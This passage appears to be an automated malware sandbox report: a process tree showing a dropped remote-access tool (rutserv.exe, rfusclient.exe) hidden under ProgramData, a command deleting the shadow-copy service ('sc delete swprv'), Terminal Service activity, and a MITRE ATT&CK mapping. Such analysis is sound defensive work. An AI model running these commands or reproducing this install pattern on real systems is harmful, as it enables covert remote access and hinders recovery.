        PID:6064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:2584

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:360
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:728
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:2128
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:2412

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4620

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:5040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:4952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/728-402-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

Filesize
4KB

Download
memory/728-404-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/2156-381-0x0000000002F30000-0x0000000002F31000-memory.dmp

Filesize
4KB

Download
memory/2156-379-0x0000000002F30000-0x0000000002F31000-memory.dmp

Filesize
4KB

Download
memory/2156-380-0x0000000003730000-0x0000000003731000-memory.dmp

Filesize
4KB

Download
memory/3692-351-0x0000000002BD0000-0x0000000002BD1000-memory.dmp

Filesize
4KB

Download